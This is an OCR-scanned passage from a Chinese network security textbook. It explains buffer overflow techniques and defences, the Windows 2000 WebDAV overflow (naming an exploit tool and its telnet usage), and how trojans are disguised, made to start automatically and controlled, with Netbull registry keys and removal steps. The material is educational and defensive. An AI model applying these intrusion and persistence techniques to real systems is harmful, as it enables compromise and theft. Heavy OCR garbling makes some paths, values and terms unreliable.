来 ) 的 方法 。 所 有 的 这 些 方法 都 是 在 寻求 改变 程序 的 执行 流程 ,使 之 跳 转 到 攻击 代码 。 最 基 
本 的 就 是 溢出 一 个 没有 边界 检查 或 者 其 他 弱点 的 缓冲 区 ,这样 就 扰乱 了 程序 的 正常 执行 顺 
序 。 通 过 溢出 一 个 缓冲 区 ,攻击 者 可 以 用 暴力 的 方法 改写 相 邻 的 程序 空间 而 直接 跳 过 了 系 
统 的 检查 。 

分 类 的 基准 是 攻击 者 所 寻求 的 缓冲 区 溢出 的 程序 空间 类 型 。 原 则 上 是 可 以 任意 的 空 
间 。 实 际 上 ,许多 的 缓冲 区 溢出 是 用 暴力 的 方法 来 寻求 改变 程序 指针 的 。 这 类 程序 的 不 同 
之 处 就 是 程序 空间 的 突破 和 内 存 空间 的 定位 不 同 ,主要 有 3 种 , 即 活动 记录 (Activation 
records) , PR Zitfá £F (Function Pointers) .长 跳 转 缓冲 区 (Longjmp Buffers). 

(D 活动 记录 。 每 当 一 个 函数 调用 发 生 时 ,调用 者 会 在 堆栈 中 留 下 一 个 活动 记录 , 它 包 
含 了 函数 结束 时 返回 的 地 址 。 攻 击 者 通过 溢出 堆栈 中 的 自动 变量 ,使 返回 地 址 指向 攻击 代 
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码 。 通 过 改变 程序 的 返回 地 址 , 当 函 数 调 用 结束 时 ,程序 就 跳 转 到 攻击 者 设 定 的 地 址 ,而 不 
是 原先 的 地 址 。 这 类 的 缓冲 区 溢出 被 称 为 堆栈 溢出 攻击 (Stack Smashing Attack) ,也 是 目 
前 最 常用 的 缓冲 区 溢出 攻击 方式 。 

© 函数 指针 。 函 数 指针 可 以 用 来 定位 任何 地 址 空间 ,如 “void * fooO ”声明 了 一 个 返回 
值 为 void 的 函数 指针 变量 foo, 所 以 攻击 者 只 需 在 任何 空间 内 的 函数 指针 附近 找到 一 个 能 
够 溢出 的 缓冲 区 ,然后 溢出 这 个 缓冲 区 来 改变 函数 指针 。 在 某 一 时 刻 , 当 程序 通过 孔 数 指针 
调用 函数 时 ,程序 的 流程 就 按 攻 击 者 的 意图 实现 了 。 它 的 一 个 攻击 范例 就 是 在 Linux 系统 
下 的 superprobe 程序 。 

© KIR RMK. 在 C 语言 中 包含 了 一 个 简单 的 检验 /恢复 系统 , 称 为 setjmp/ 
longjmp。 意 思 是 在 检验 点 设 定 setjmp(buffer), 用 longjmp(buffer) 来 恢复 检验 点 。 然 而 ， 
如 果 攻 击 者 能 够 进入 缓冲 区 的 空间 ,那么 longjmp(buffer) 实 际 上 是 跳 转 到 攻击 者 的 代码 。 
像 函 数 指针 一 样 ,longjmp 缓冲 区 能 够 指向 任何 地 方 , 所 以 攻击 者 所 要 做 的 就 是 找到 一 个 可 
供 溢出 的 缓冲 区 。 一 个 典型 的 例子 就 是 Perl 5. 003 的 缓冲 区 溢出 漏洞 ; 攻击 者 首先 进入 用 
来 恢复 缓冲 区 溢出 的 longjmp 缓冲 区 ,然后 诱导 进入 恢复 模式 ,这 样 就 使 Perl 的 解释 器 跳 
转 到 攻击 代码 上 了 。 

CD 对 代码 安排 和 控制 程序 执行 流程 两 种 技术 的 综合 分 析 。 最 常见 的 缓冲 区 溢出 攻击 
类 型 就 是 在 一 个 字符 串 里 综合 了 代码 植 入 和 活动 记录 技术 。 攻 击 者 定位 一 个 可 供 溢出 的 自 
动 变量 ,然后 向 程序 传递 一 个 很 大 的 字符 串 , 在 引发 缓冲 区 溢出 、 改 变 活动 记录 的 同时 植 入 
了 代码 。 这 个 是 由 Levy 指出 的 攻击 的 模板 。C 在 习惯 上 只 为 用 户 和 参数 开辟 很 小 的 缓冲 
区 ,因此 这 种 漏洞 攻击 的 实例 十 分 常见 。 

代码 植 人 和 缓冲 区 溢出 不 一 定 要 在 一 次 动作 内 完成 。 攻 击 者 可 以 在 一 个 缓冲 区 内 放置 
代码 ,这 是 不 能 溢出 的 缓冲 区 。 然 后 ,攻击 者 通过 溢出 另 一 个 缓冲 区 来 转移 程序 的 指针 。 这 
种 方法 一 般 用 来 解决 可 供 溢出 的 缓冲 区 不 够 大 (不 能 放下 全 部 的 代码 ) 的 情况 。 

如 果 攻 击 者 试图 使 用 已 经 常 驻 的 代码 而 不 是 从 外 部 植 人 代码 ,他 们 通常 必须 把 代码 作 
为 参数 调用 。 举 例 来 说 ,在 libc( 几 乎 所 有 的 C 程序 都 要 它 来 连接 ) 中 的 部 分 代码 段 会 执行 
exec( something) ,其 中 something 就 是 参数 。 攻 击 者 首先 使 用 缓冲 区 溢出 改变 程序 的 参 
数 ,然后 利用 另 一 个 缓冲 区 溢出 使 程序 指针 指向 libe 中 的 特定 代码 段 。 

3. 缓冲 区 溢出 攻击 的 防范 

缓冲 区 溢出 攻击 占 了 远程 网 络 攻击 的 绝 大 多 数 ,这 种 攻击 可 以 使 得 一 个 匿名 的 
Internet 用 户 有 机 会 获得 一 台 主 机 的 部 分 或 全 部 的 控制 权 。 如 果 能 有 效 地 消除 缓冲 区 溢出 
的 漏洞 , 则 很 大 一 部 分 的 安全 威胁 可 以 得 到 缓解 。 缓 冲 区 溢出 攻击 的 防范 主要 从 操作 系统 
安全 和 程序 设计 两 方面 实施 。 操 作 系 统 安 全 是 最 基本 的 防范 措施 ,其 方法 简单 ,只 需 及 时 安 
装 系统 补丁 即 可 。 程 序 设计 方面 的 措施 主要 有 以 下 几 点 。 

(1) 强制 编写 正确 的 代码 。 编 写 正 确 的 代码 是 一 件 非常 有 意义 但 耗 时 的 工作 ,特别 像 
编写 C 语言 那 种 具有 容易 出 错 倾向 的 程序 (如 字符 串 的 零 结尾 ) ,这 种 风格 是 由 于 追求 性 能 
而 忽视 正确 性 的 习惯 引起 的 。 尽 管 人 们 知道 了 如 何 编写 安全 的 程序 ,但 具有 安全 漏洞 的 程 
序 依旧 出 现 , 为 此 人 们 开发 了 一 些 工 具 和 技术 来 帮助 程序 员 编 写 安全 正确 的 程序 。 例 如 ,用 
grep 搜索 源 代码 中 容易 产生 漏洞 的 库 的 调用 ,如 strepy 的 sprintf 的 调用 ,都 没有 检查 输入 
参数 的 长 度 。 
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虽然 这 些 工 具 可 以 帮助 程序 员 开发 更 安全 的 程序 ,但 是 由 于 C 语言 的 特点 ,这 些 工 具 
不 可 能 找 出 所 有 的 缓冲 区 溢出 漏洞 。 所 以 , 侦 错 技术 只 能 用 来 减少 缓冲 区 溢出 的 可 能 ,并 不 
能 完全 地 消除 它 。 除 非 程序 员 能 保证 他 的 程序 万 无 一 失 ,否则 还 是 要 用 到 以 下 部 分 的 内 容 
来 保证 程序 的 可 靠 性 。 

(2) 非 执行 的 缓冲 区 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 得 攻击 
者 可 不 能 执行 被 攻击 程序 输入 缓冲 区 的 代码 ,这 种 技术 称 为 非 执 行 的 缓冲 区 技术 。 非 执行 
堆栈 的 保护 可 以 有 效 地 对 付 把 代码 植 人 自动 变量 缓冲 区 的 溢出 攻击 ,而 对 于 其 他 形式 的 攻 
击 则 没有 效果 ,如 通过 引用 一 个 驻 留 程序 的 指针 就 可 以 跳 过 这 种 保护 措施 。 其 他 攻击 也 可 
以 把 代码 植 入 堆栈 或 者 静态 数据 中 来 跳 过 保护 。 

G) 数组 边界 检查 。 植 入 代码 引起 缓冲 区 溢出 是 一 个 方面 ,扰乱 程序 的 执行 流程 是 另 
一 个 方面 。 不 像 非 执 行 的 缓冲 区 保护 ,数组 边界 检查 完全 防止 了 缓冲 区 溢出 的 产生 和 攻击 。 

(4) 程序 指针 完整 性 检查 。 与 边界 检查 略 有 不 同 , 也 与 防止 指针 被 改变 不 同 ,程序 指针 
完整 性 检查 是 在 程序 指针 被 引用 之 前 检测 到 宏观 世界 的 改变 。 因 此 ,即便 一 个 攻击 者 成 功 
地 改变 了 程序 的 指针 ,由 于 系统 事先 检测 到 了 指针 的 改变 ,因此 这 个 指针 将 不 会 被 使 用 。 

与 数组 边界 检查 相 比 ,这 种 方法 不 能 解决 所 有 的 缓冲 区 溢出 问题 ,采用 其 他 缓冲 区 溢出 
方法 就 可 以 避免 这 种 检查 。 但 是 这 种 方法 的 性 能 上 有 很 大 的 优势 ,而 且 兼容 性 也 很 好 。 

4. 应 用 案例 

Windows 2000 WebDAV 远程 缓冲 区 溢出 漏洞 是 微软 的 又 一 重大 漏洞 ,是 通过 IIS 产 
生 这 个 漏洞 的 ,但 是 漏洞 本 身 并 不 是 HS 造成 的 ,而 是 由 于 WebDAV 使 用 了 ntdll. dll 中 的 
一 些 API 函数 ,而 这 些 函 数 存在 一 个 缓冲 区 溢出 漏洞 ,也 就 是 说 ,很 多 调用 这 个 API 的 应 用 
程序 都 存在 这 个 漏洞 。 

Windows IIS 5. 0 是 Windows 2000 自 带 的 一 个 网 络 信息 服务 器 ,其 中 包含 HTTP JR 
务 功能 。IIS5 默认 提供 了 对 WebDAV 的 支持 ,WebDAV( 基 于 Web 的 分 布 式 协作 和 改写 ) 
是 一 组 对 HTTP 协议 的 扩展 , 它 允 许 用 户 协作 地 编辑 和 管理 远程 Web 服务 器 上 的 文件 。 
使 用 WebDAV ,可 以 通过 HTTP 向 用 户 提供 远程 文件 存储 的 服务 ,包括 创建 移动、 复制 及 
删除 远程 服务 器 上 的 文件 ,但 是 作为 普通 的 HTTP 服务 器 ,这 个 功能 不 是 必需 的 。 

Windows IIS 5.0 包含 的 WebDAV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数据 ,远程 
攻击 者 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权限 在 系统 上 执 
行 任意 指令 。 

Windows IIS 5. 0 的 WebDAV 使 用 了 ntdll. dll 中 的 一 些 函 数 ,而 这 些 函 数 存在 一 个 组 
冲 区 溢出 漏洞 。 通 过 对 WebDAV 的 畸形 请 求 可 以 触发 这 个 溢出 。 成 功利 用 这 个 漏洞 可 以 
获得 LocalSystem 权限 。 这 意味 着 ,入侵 者 可 以 获得 主机 的 完全 控制 能 力 。 

所 以 确切 地 说 ,这 个 漏洞 并 不 是 IIS 造成 的 ,而 是 ntdll. dll 里 面 的 一 个 API 函数 造成 
的 。 也 就 是 说 ,很 多 调用 这 个 API 函数 的 应 用 程序 都 存在 这 个 漏洞 。 

(1) 受 影响 系统 。 

包括 Windows IIS 5.0 系统 。 

(D Microsoft Windows 2000 Server SP3., 

@ Microsoft Windows 2000 Professional SP3 。 

@ Microsoft Windows 2000 Datacenter Server SP3, 
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(D Microsoft Windows 2000 Advanced Server SP3, 

(2) 漏洞 检测 工具 。Webdavscan. exe 是 webdav 漏洞 专用 扫描 器 ,由 红 客 联盟 出 品 。 
它 可 以 对 不 同 IP 段 进行 扫描 ,来 检测 网 段 的 Microsoft IIS 5. 0 服务 器 是 否 提供 了 对 
WebDA V 的 支持 ,如 果 结 果 显 示 enable, 则 说 明 此 服务 器 支持 webDAV 并 可 能 存在 漏洞 。 
webdavx3. exe 是 isno 的 针对 Windows 2000 中 文 版 的 溢出 工具 ,不 用 NC 监听 端口 ,溢出 
成 功 后 直接 telnet ip 7788 即 可 。 

(3) 解决 方法 。 要 避免 此 漏洞 可 安装 安全 补丁 。 

Solution\Q815021_W2K_sp4_x86_CN. EXE 适用 于 中 文 Windows 2000。 

Solution\Q815021_W2K_sp4_x86_EN. EXE 适用 于 英文 Windows 2000, 

设置 注册 表 : 双击 Solution\webdav. reg 导入 即 可 。 


3.3.4 木马 攻击 
在 介绍 木马 的 原理 之 前 , 先 介绍 一 些 木马 构成 的 基础 知识 ,因为 下 面 有 很 多 地 方 会 提 到 
这 些 内 容 。 


一 个 完整 的 木马 系统 由 硬件 部 分 ,软件 部 分 和 具体 连接 部 分 组 成 。 

CD 硬件 部 分 。 建 立木 马 连 接 所 必需 的 硬件 实体 。 控 制 端 : 对 服务 端 进行 远程 控制 的 
一 方 。 服 务 端 : 被 控制 端 远程 控制 的 一 方 。Internet: 控制 端 对 服务 端 进行 远程 控制 ,数据 
传输 的 网 络 载体 。 

CD 软件 部 分 。 实 现 远程 控制 所 必需 的 软件 程序 。 控 制 端 程序 : 控制 端 用 以 远程 控制 
服务 端的 程序 。 木 马 程序 : 潜入 服务 端 内 部 ,获取 其 操作 权限 的 程序 。 木 马 配置 程序 : 设 
署 木 马 程序 的 端口 号 .触发 条 件 .木马 名 称 等 使 其 在 服务 端 藏 得 更 隐蔽 的 程序 。 

CD 具体 连接 部 分 。 通 过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 信道 所 必需 的 
元 素 。 控 制 端 IP、 服 务 端 IP: 即 控制 端 ,服务 端的 网 络 地 址 ,也 是 木马 进行 数据 传输 的 目的 
地 。 控 制 端 端 口 .木马 端口 : 即 控制 端 .服务 端的 数据 入 口 ,通过 这 个 入 口 数据 可 直达 控制 
端 程序 或 木马 程序 。 

1. 特洛伊 木马 攻击 原理 

使 用 木马 这 种 黑客 工具 进行 网 络 入 侵 , 从 过 程 上 看 大 致 可 分 为 6 步 。 接 下 来 就 按 这 
6 步 来 详细 阐述 木马 的 攻击 原理 。 

1) 配置 木马 

一 般 来 说 一 个 设计 成 熟 的 木马 都 有 木马 配置 程序 ,从 具体 的 配置 内 容 看 ,主要 是 为 了 实 
现 以 下 两 方面 功能 。 

(1) 木马 伪装 。 木 马 配置 程序 为 了 在 服务 端 尽 可 能 好 地 隐藏 木马 ,会 采用 多 种 伪装 手 
段 , 如 修改 图 标 .捆绑 文件 .定制 端口 .自我 销毁 等 。 

CD 信息 反馈 。 木 马 配 置 程序 将 就 信息 反馈 的 方式 或 地 址 进行 设置 ,如 设置 信息 反馈 
的 邮件 地 址 、.IRC 号 ICQ 号 等 。 

2) 传播 木马 

CD 传播 方式 。 木 马 的 传播 方式 主要 有 两 种 : 一 种 是 通过 E-mail, 控 制 端 将 木马 程序 
以 附件 的 形式 夹 在 邮件 中 发 送出 去 , 收 信 人 只 要 打开 附件 系统 就 会 感染 木马 ; 另 一 种 是 软 
件 下 载 ,一 些 非 正 规 的 网 站 以 提供 软件 下 载 为 名 义 ,将 木马 捆绑 在 软件 安装 程序 上 ,下 载 后 
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只 要 一 运行 这 些 程序 ,木马 就 会 自动 安装 。 

(2) 伪装 方式 。 鉴 于 木马 的 危害 性 ,很 多 人 对 木马 知识 还 是 有 一 定 了 解 的 ,这 对 木马 的 
传播 起 到 了 一 定 的 抑制 作用 ,这 是 木马 设计 者 所 不 愿 见 到 的 。 因 此 ,他 们 开发 了 多 种 功能 来 
伪装 木马 ,以 达到 降低 用 户 警觉 .欺骗 用 户 的 目的 。 

伪装 方式 一 般 来 说 有 以 下 几 种 。 

CD 修改 图 标 。 也 许 你 会 在 E-mail 的 附件 中 看 到 一 个 很 平常 的 文本 图 标 ,但 是 我 不 得 
不 告诉 你 ,这 也 有 可 能 是 个 木马 程序 ,现在 已 经 有 木马 可 以 将 木马 服务 端 程序 的 图 标 改 成 
HTML, TXT, ZIP 等 各 种 文件 的 图 标 ,这 有 相当 大 的 迷惑 性 ,但 是 目前 提供 这 种 功能 的 木 
马 还 不 多 见 。 

© 搁 绑 文件 。 这 种 伪装 手段 是 将 木马 捆绑 到 一 个 安装 程序 上 , 当 安 装 程序 运行 时 , 木 
马 在 用 户 毫 无 察觉 的 情况 下 ,偷偷 地 进入 了 系统 。 被 捆绑 的 文件 都 是 可 执行 文件 , 即 EXE, 
COM 之 类 的 文件 。 

@ 出 错 显 示 。 有 一 定 木 马 知识 的 人 都 知道 ,如 果 打 开 一 个 文件 ,没有 任何 反应 ,这 很 可 
能 就 是 个 木马 程序 ,木马 的 设计 者 也 意识 到 了 这 个 缺陷 ,所 以 已 经 有 木马 提供 了 一 个 叫做 出 
错 显 示 的 功能 。 当 服务 端 用 户 打 开 木 马 程序 时 ,会 弹出 一 个 错误 提示 框 一 一 这 当然 是 假 的 ， 
错误 内 容 可 自由 定义 ,大 多 会 定制 成 一 些 诸如 “文件 已 破坏 ,无 法 打开 的 1" 之 类 的 信息 , 当 服 
务 端 用 户 信 以 为 真 时 ,木马 却 悄 悄 侵 入 了 系统 。 

@ 定制 端口 。 很 多 老式 的 木马 端口 都 是 固定 的 ,这 给 判断 是 否 感染 了 木马 带 来 了 方 
便 , 只 要 查 一 下 特定 的 端口 就 知道 感染 了 什么 木马 ,所 以 现在 很 多 新 式 的 木马 都 加 入 了 定制 
端口 的 功能 ,控制 端 用 户 可 以 在 1024 一 65 535 任 选 一 个 端口 作为 木马 端口 。 一 般 不 选 1024 
以 下 的 端口 ,这 样 就 给 判断 感染 木马 类 型 带 来 了 麻烦 。 

C 自我 销毁 。 这 项 功能 是 为 了 弥补 木马 的 一 个 缺陷 。 当 服务 端 用 户 打开 含有 木马 的 
文件 后 ,木马 会 将 自己 复制 到 Windows 的 系统 文件 的 C:\Windows zk C; \Windows\ 
System 目录 下 。 一 般 来 说 ,原木 马 文件 和 系统 文件 夹 中 的 木马 文件 大 小 是 一 样 的 ,捆绑 文 
件 的 木马 除外 。 那 么 中 了 木马 的 朋友 只 要 在 近来 收 到 的 信件 和 下 载 的 软件 中 找到 原木 马 文 
件 , 然 后 根据 原木 马 的 大 小 去 系统 文件 夹 找 相同 大 小 的 文件 ,判断 哪个 是 木马 就 行 了 。 而 木 
马 的 自我 销毁 功能 是 指 安装 完 木 马 后 ,原木 马 文 件 将 自动 销毁 ,这 样 服务 端 用 户 很 难 找到 木 
马 的 来 源 , 在 没有 查 杀 木马 工具 的 帮助 下 ,就 很 难 删除 木 马 了 。 

© 木马 更 名 。 安 装 到 系统 文件 夹 中 的 木马 的 文件 名 一 般 是 固定 的 ,那么 只 要 根据 一 些 
查 杀 木马 的 文章 , 按 图 索 骚 在 系统 文件 夹 查找 特定 的 文件 ,就 可 以 断定 中 了 什么 木马 。 所 以 
现在 有 很 多 木马 都 允许 控制 端 用 户 自由 定制 安装 后 的 木马 文件 名 ,这 样 很 难 判断 所 感染 的 
木马 类 型 了 。 

3) 运行 木马 

服务 端 用 户 运行 木马 或 捆绑 木马 的 程序 后 ,木马 就 会 自动 进行 安装 。 首 先 将 自身 复制 
到 Windows 的 系统 文件 夹 中 (C:\Windows 或 C:\Windows\System 目录 下 ); 然后 在 注册 
表 、 启 动 组 , 非 启动 组 中 设置 好 木马 的 触发 条 件 , 这 样 木 马 的 安装 就 完成 了 。 安 装 后 就 可 以 
启动 木马 了 。 

CD 由 触发 条 件 激活 木马 。 触 发 条 件 是 指 启动 木马 的 条 件 , 大 致 出 现在 下 面 几 个 地 方 。 

(D 注册 表 。 打 开 HKEY LOCAL. MACHINE \ Software \ Microsoft N Windows V 
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CurrentVersion\ 下 的 5 个 以 Run 和 RunServices 命名 的 主键 ,在 其 中 寻找 可 能 是 启动 木马 
的 键 值 。 

© 打开 HKEY_ CLASSES ROOTN XF% #! \ shell\ open\ command 主键 ,查看 其 键 
值 。 举 个 例子 ,国产 木马 “冰河 ”就 是 修改 HKEY CLASSES ROOTWixtfileshellVopenV 
command 下 的 键 值 ,将 “C:\Windows N Notepad. exe %1” 改 为 “C:\Windows\System\ 
Sysexplr. exe %1”, 这 时 双击 一 个 文本 文件 后 ,原本 应 用 Notepad 打开 文件 的 ,现在 却 变 成 
启动 木马 程序 了 。 还 要 说 明 的 是 不 仅 是 文本 文件 ,通过 修改 HTML、EXE、ZIP 等 文件 的 启 
动 命令 的 键 值 都 可 以 启动 木马 ,不 同 之 处 只 在 于 “文件 类 型 "这 个 主键 的 差别 , TXT 是 
txtfile、zip 对 应 的 类 型 是 winzip, 大 家 可 以 试 着 去 找 一 下 。 

@ Win. ini, C; N Windows 目录 下 有 一 个 配置 文件 win. ini, 用 文本 方式 打开 ,在 
Windows 字段 中 有 启动 命令 load — #ll run= ,一 般 情况 下 是 空白 的 ,如 果 有 启动 程序 , 则 可 
能 是 木马 。 

(D System. ini, C; VN Windows 目录 下 有 个 配置 文件 system. ini, 用 文本 方式 打开 ,在 
386Enh ,mic .drivers32 中 有 命令 行 ,在 其 中 寻找 木马 的 启动 命令 。 

© Autoexec. bat 和 Config. sys, fE C 盘 根 目 录 下 的 这 两 个 文件 也 可 以 启动 木马 。 但 
这 种 加 载 方式 一 般 都 需要 控制 端 用 户 与 服务 端 建立 连接 后 ,将 已 添加 木马 启动 命令 的 同名 
文件 上 传 到 服务 端 覆 盖 这 两 个 文件 才 行 。 

© *.INI。 即 应 用 程序 的 启动 配置 文件 ,控制 端 利用 这 些 文件 能 启动 程序 的 特点 ,将 
制作 好 的 带 有 木马 启动 命令 的 同名 文件 上 传 到 服务 端 覆 盖 这 同名 文件 ,这 样 就 可 以 达到 启 
动 木马 的 目的 了 。 

CD 捆绑 文件 。 实 现 这 种 触发 条 件 首先 要 控制 端 和 服务 端 通 过 木马 建立 连接 ,然后 控制 
端 用 户 用 工具 软件 将 木马 文件 和 某 一 应 用 程序 捆绑 在 一 起 ,然后 上 传 到 服务 端 覆 盖 原 文件 ， 
这 样 即使 木马 被 删除 了 ,只 要 运行 捆绑 了 木马 的 应 用 程序 ,木马 又 会 被 安装 上 去 了 。 

@ 启动 菜单 : 在 “开始 ”|* 程 序 "|* 启 动 * 选 项 下 也 可 能 有 木马 的 触发 条 件 。 

(2) 木马 运行 过 程 。 木 马 被 激活 后 进入 内 存 ,并 开启 事先 定义 的 木马 端口 ,准备 与 控制 
端 进行 连接 ,就 可 以 在 进入 MS-DOS 方式 下 ,用 netstat 命令 的 -a、-n 参数 通过 端口 的 状态 
来 查看 是 否 有 可 疑 端口 开放 ,以 进一步 判断 是 否 感 当 了 木马 。 下 面 是 计算 机 感染 木马 后 ,用 
Netstat 命令 查看 端口 的 两 个 实例 : 服务 端 与 控制 端 建立 连接 时 的 显示 状态 ; 服务 端 与 控制 
端 还 未 建立 连接 时 的 显示 状态 。 

在 上 网 过 程 中 下 载 软件 .发送 信件 .网 上 聊天 等 必然 打开 一 些 端口 ,下 面 是 一 些 常 用 
端口 。 

(D 1—1024 端口 。 这 些 端口 叫 保留 端口 ,是 专 给 一 些 对 外 通信 的 程序 用 的 ,如 FTP 使 
JH 21, SMTP {EJH 25, POP3 使 用 110 等 。 只 有 很 少 木马 会 用 保留 端口 作为 木马 端口 。 

@ 1025 以 上 的 连续 端口 。 在 上 网 浏览 网 站 时 ,浏览 器 会 打开 多 个 连续 的 端口 下 载 文 
字 、 图 片 到 本 地 硬盘 上 ,这 些 端 口 都 是 1025 以 上 的 连续 端口 。 

@ 4000 端口 。 这 是 OICQ 的 通信 端口 。 

QD 6667 端口 。 这 是 IRC 的 通信 端口 。 

除 上 述 端口 基本 可 以 排除 在 外 ,如 发 现 还 有 其 他 端口 打开 ,尤其 是 数值 比较 大 的 端口 ， 
那 就 要 怀疑 是 否 感 染 了 木马 ,当然 如 果木 马 有 定制 端口 的 功能 , 那 任何 端口 都 有 可 能 是 木马 
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端口 。 

D 泄露 信息 

一 般 来 说 ,设计 成 熟 的 木马 都 有 一 个 信息 反馈 机 制 。 信 息 反馈 机 制 是 指 木马 成 功 安 装 
后 会 收集 一 些 服 务 端的 软 、 硬 件 信息 ,并 通过 E-mail IRC 或 ICO 的 方式 告知 控制 端 用 户 。 

5) 建立 连接 

一 个 木马 连接 的 建立 首先 必须 满足 两 个 条 件 : 一 是 服务 端 已 安装 了 木马 程序 ; 二 是 控 
制 端 服务 端 都 要 在 线 。 在 此 基础 上 控制 端 可 以 通过 木马 端口 与 服务 端 建立 连接 。 

6) 远程 控制 

木马 连接 建立 后 ,控制 端 端 口 和 木马 端口 之 间 将 会 出 现 一 条 通道 ,控制 端 上 的 控制 端 程 
序 可 利用 这 条 信道 与 服务 端 上 的 木马 程序 取得 联系 ,并 通过 木马 程序 对 服务 端 进行 远程 
控制 。 

下 面 介绍 控制 端 具 体能 享有 哪些 控制 权限 ,这 远 比 你 想象 的 要 大 。 

CD 窃取 口令 。 一 切 以 明文 的 形式 、* 形式 或 缓存 在 Cache 中 的 口令 都 能 被 木马 侦 测 
到 ,此 外 很 多 木马 还 提供 有 击 键 记 录 功 能 , 它 将 会 记录 服务 端 每 次 敲 击 键盘 的 动作 ,所 以 一 
且 有 木马 入 侵 ,口令 将 很 容易 被 窃取 。 

(2) 文件 操作 。 控 制 端 可 利用 由 远程 控制 对 服务 端 上 的 文件 进行 删除 新建、 修改 .上 
传 、 下 载 . 和 运行, 更改 属性 等 一 系列 操作 ,基本 涵盖 了 Windows 平台 上 所 有 的 文件 操作 功能 。 

(3) 修改 注册 表 。 控 制 端 可 任意 修改 服务 端 注册 表 ,包括 删除 .新建 或 修改 主键 . 子 键 、 
键 值 。 有 了 这 项 功能 控制 端 就 可 以 禁止 服务 端 软驱 、 光 驱 的 使 用 , 锁 住 服务 端的 注册 表 , 将 
服务 端 上 木马 的 触发 条 件 设置 得 更 隐蔽 等 一 系列 高 级 操作 。 

(4) 系统 操作 。 这 项 内 容 包 括 重启 或 关闭 服务 端 操作 系统 , 断 开 服务 端 网 络 连 接 ,控制 
服务 端的 鼠标 BË k ,监视 服务 端 桌面 操作 ,查看 服务 端 进程 等 ,控制 端 甚至 可 以 随时 给 服务 
端 发 送信 息 ,想象 一 下 , 当 服 务 端的 桌面 上 突然 跳出 一 段 话 ,不 吓人 一 跳 才 怪 。 

2. 特洛伊 木马 程序 的 防范 

预防 特洛伊 木马 程序 ,有 以 下 几 种 办 法 。 

(1) 提高 防范 意识 。 不 要 打开 陌生 人 信 中 的 附件 ,熟人 的 信件 也 要 确认 一 下 来 信 的 原 
地 址 是 否 合法 。 

(2) 多 读 readme. txt。 许 多 人 出 于 研究 目的 下 载 了 一 些 特洛伊 木马 程序 的 软件 包 , 在 
没有 和 弄 清 软件 包 中 几 个 程序 的 具体 功能 前 ,就 匆匆 地 执行 其 中 的 程序 ,这 样 往往 就 错误 地 执 
行 了 服务 器 端 程序 而 使 用 户 的 计算 机 成 为 了 特洛伊 木马 的 牺牲 品 。 软 件 包 中 经 常 附带 的 
readme. txt 文件 会 有 程序 的 详细 功能 介绍 和 使 用 说 明 ,尽管 它 一 般 是 英文 的 ,但 还 是 有 必 
要 先 阅读 一 下 ,如 果实 在 读 不 懂 , 那 最 好 不 要 执行 任何 程序 ,丢弃 软件 包 当 然 是 最 保险 的 了 。 

(3) 使 用 杀毒 软件 。 现 在 国内 的 杀毒 软件 都 推出 了 清除 某 些 特洛伊 木马 的 功能 ,如 
KV300 、Kill98、 瑞 星 等 ,可 以 不 定期 地 在 脱 机 的 情况 下 进行 检查 和 清除 。 

(4) 立即 挂 断 。 尽 管 造成 上 网 速度 突然 变 慢 的 原因 有 很 多 ,但 有 理由 怀疑 这 是 由 特 洛 
伊 木马 造成 的 , 当 入 侵 者 使 用 特洛伊 的 客户 端 程序 访问 你 的 机 器 时 ,会 与 你 的 正常 访问 抢占 
宽带 ,特别 是 当 入 侵 者 从 远 端 下 载 用 户 硬盘 上 的 文件 时 ,正常 访问 会 变 得 奇 慢 无 比 。 

(5) 监测 系统 文件 和 注册 表 的 变化 。 
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3. 应 用 案例 

特洛伊 木马 攻击 的 常用 工具 及 方法 。 

1) Netbull 

网 络 公牛 又 名 Netbull, 是 国产 木马 ,默认 连接 端口 234444, 最 新 版 本 为 V1. 1。 运 行 服 
务 端 程序 newserver. exe 后 ,会 自动 脱 壳 成 checkdll. exe, 位 于 C:\Windows\System 下 ,下 
次 开机 checkdll. exe 将 自动 运行 ,因此 很 隐蔽 、 危 害 很 大 。 同 时 ,服务 端 运行 后 会 自动 捆绑 
以 下 文件 。 

在 Windows 2000 下 会 出 现 文件 改动 报警 .但 也 不 能 阻止 以 下 文件 的 捆绑 : notepad. 
exe,regedit. exe, reged32. exe .drwtsn32. exe, winmine. exe, 

服务 端 运 行 后 还 会 捆绑 在 开机 时 自动 运行 的 第 三 方 软件 (如 realplay. exe, QQ, ICQ. 
等 ) 上 。 在 注册 表 中 网 络 公牛 也 悄悄 地 扎 下 了 根 ,代码 如 下 : 

[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run] 

"CheckD11. exe" = "C: NWINDOWSN SYSTEM\ CheckD11. exe" 

[HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 

"CheckD11. exe" = "C: VWINDOWSV SYSTEM V CheckD11. exe" 


[HKEY USERSV. DEFAULTASoftwareMMicrosoftWWindowsVCurrentVersionWRun] 
"CheckD11. exe" = "C: NWINDOWSN SYSTEM\ CheckD11. exe" 


网 络 公 牛 采用 文件 拥 绑 功能 ,和 上 面 所 列 出 的 文件 捆绑 在 一 块 , 要 清除 非常 困难 。 这 样 
做 也 容易 暴露 自己 。 稍 微 有 经 验 的 用 户 就 会 发 现 文件 长 度 发 生 了 变化 ,从 而 怀疑 自己 感染 
了 “木马 ”病毒 。 

清除 方法 如 下 。 

CD 删除 网 络 公 牛 的 自 启动 程序 C:\Windows\System\CheckDIl. exe; 

(2) 把 网 络 公牛 在 注册 表 中 所 建立 的 键 值 全 部 删除 (上 面 所 列 出 的 那些 键 值 全 部 删除 ) 。 

G) 检查 上 面 列 出 的 文件 ,如 果 发 现 文件 长 度 发 生 了 变化 (大 约 增加 了 40KB, 可 以 通过 
与 其 他 机 器 上 的 正常 文件 比较 得 知 ) ,就 删除 它们 。 然 后 依次 单 击 开 始 ”| “附件 ”|“ 系 统 工 
具 ”|“ 系 统 信息 ”1“ 工 具 ”|“ 系 统 文件 检查 器 ”, 在 弹出 的 对 话 框 中 选中 “从 安装 软盘 提取 一 个 
文件 ”, 在 对 话 框 中 输入 要 提取 的 文件 (前 面 你 删除 的 文件 ) , 单 击 “确定 ?按钮 ,然后 按 屏 幕 提 
